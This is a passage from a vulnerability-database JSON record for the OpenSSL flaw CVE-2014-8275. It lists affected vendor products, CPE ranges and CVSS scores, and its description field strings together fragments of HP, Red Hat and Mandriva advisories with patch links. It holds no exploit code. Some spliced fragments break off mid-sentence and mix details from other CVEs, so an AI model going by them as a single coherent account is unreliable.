"vendor": "ibm", "version": "4.1.2.10" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "ctpos 6.6r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.01" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.52" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "550" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350078390" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "management center", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.3.2.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504965" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "aura conferencing sp6", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.70" }, { "model": "content analysis system", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.2.3.1" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura messaging sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.31" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.00" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "71935" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "NVD", "id": "CVE-2014-8275" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8zc", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-8275" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130545" } ], "trust": 0.6 }, "cve": "CVE-2014-8275", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-8275", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-8275", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-8275", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-8275" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "NVD", "id": "CVE-2014-8275" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate\u0027s unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c. OpenSSL is prone to a local security-bypass vulnerability. \nLocal attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. 5 client) - i386, x86_64\n\n3. Note: this flaw is not exploitable via the TLS/SSL protocol because\nthe data being transferred is not Base64-encoded. TLS/SSL clients and servers using OpenSSL were not\naffected by this flaw. (CVE-2015-0289)\n\nRed Hat would like to thank the OpenSSL project for reporting \nCVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0292, and \nCVE-2015-0293. Upstream acknowledges Emilia K\u00e4sper of the OpenSSL \ndevelopment team as the original reporter of CVE-2015-0287, Brian Carpenter\nas the original reporter of CVE-2015-0288, Michal Zalewski of Google as the\noriginal reporter of CVE-2015-0289, Robert Dugal and David Ramos as the \noriginal reporters of CVE-2015-0292, and Sean Burford of Google and Emilia \nK\u00e4sper of the OpenSSL development team as the original reporters of \nCVE-2015-0293. This could lead to a Denial\n Of Service attack (CVE-2014-3571). In particular this could occur if an attacker\n sent repeated DTLS records with the same sequence number but for the\n next epoch. The memory leak could be exploited by an attacker in a\n Denial of Service attack through memory exhaustion (CVE-2015-0206). This effectively removes forward secrecy from\n the ciphersuite (CVE-2014-3572). A server could present\n a weak temporary key and downgrade the security of the session\n (CVE-2015-0204). This\n only affects servers which trust a client certificate authority which\n issues certificates containing DH keys: these are extremely rare and\n hardly ever encountered (CVE-2015-0205). \n \n OpenSSL accepts several non-DER-variations of certificate signature\n algorithm and signature encodings. OpenSSL also does not enforce a\n match between the signature algorithm between the signed and unsigned\n portions of the certificate. By modifying the contents of the signature\n algorithm or the encoding of the signature, it is possible to change\n the certificate\u0026#039;s fingerprint. It also does not affect\n common revocation mechanisms. Only custom applications that rely\n on the uniqueness of the fingerprint (e.g. certificate blacklists)\n may be affected (CVE-2014-8275). \n \n The updated packages have been upgraded to the 1.0.0p version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n https://www.openssl.org/news/secadv_20150108.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm\n 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm\n aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm\n c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm\n fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm \n ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb\nLHbCdAkBpYHYSuaUwpiAu1w=\n=ePa9\n-----END PGP SIGNATURE-----\n. \nHP SSL for OpenVMS: All versions prior to 1.4-502. \n\n HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the\nfollowing locations:\n\n - HP SSL for OpenVMS website:\n\n http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\n - HP Support Center website:\n\n https://h20566.www2.hp.com/portal/site/hpsc/patch/home\n\n Note: Login using your HP Passport account. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04774019\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04774019\nVersion: 1\n\nHPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 